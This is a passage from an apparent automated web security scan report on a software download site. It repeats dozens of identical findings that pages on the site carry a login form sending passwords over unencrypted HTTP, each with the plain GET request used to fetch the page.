Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.147. http://www.x64bitdownload.com/64-bit-conference-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.148. http://www.x64bitdownload.com/64-bit-cross-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-cross-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-cross-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.149. http://www.x64bitdownload.com/64-bit-download-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.150. http://www.x64bitdownload.com/64-bit-downloader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.151. http://www.x64bitdownload.com/64-bit-explorer-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-explorer-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-explorer-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.152. http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.153. http://www.x64bitdownload.com/64-bit-fast-download-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-fast-download-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-fast-download-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.154. http://www.x64bitdownload.com/64-bit-feed-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-feed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.155. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-feedreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-feedreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.156. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-file-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.157. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-file-sharing-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-file-sharing-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.158. http://www.x64bitdownload.com/64-bit-firefox-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-firefox-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-firefox-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.159. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.160. http://www.x64bitdownload.com/64-bit-forum-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.161. http://www.x64bitdownload.com/64-bit-forums-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-forums-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-forums-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.162. http://www.x64bitdownload.com/64-bit-google-groups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-google-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-google-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.163. http://www.x64bitdownload.com/64-bit-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.164. http://www.x64bitdownload.com/64-bit-group-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-group-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-group-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.165. http://www.x64bitdownload.com/64-bit-groups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-groups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.166. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.167. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.168. http://www.x64bitdownload.com/64-bit-images-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.169. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.170. http://www.x64bitdownload.com/64-bit-internet-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.171. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.172. http://www.x64bitdownload.com/64-bit-killfile-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.173. http://www.x64bitdownload.com/64-bit-mp3-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.174. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.175. http://www.x64bitdownload.com/64-bit-multipart-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.176. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.177. http://www.x64bitdownload.com/64-bit-news-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.178. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.179. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.180. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.181. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.182. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.183. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.184. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.185. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.186. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.187. http://www.x64bitdownload.com/64-bit-nntp-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.188. http://www.x64bitdownload.com/64-bit-nzb-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.189. http://www.x64bitdownload.com/64-bit-ozum-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.190. http://www.x64bitdownload.com/64-bit-par-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.191. http://www.x64bitdownload.com/64-bit-podcast-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.192. http://www.x64bitdownload.com/64-bit-posts-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-posts-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-posts-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.193. http://www.x64bitdownload.com/64-bit-rar-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-rar-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.x64bitdownload.com/login.html

The form contains the following password field:

password

Request

GET /64-bit-rar-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

6.194. http://www.x64bitdownload.com/64-bit-reader-c-44-newsgroup-clients-downloads.html previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
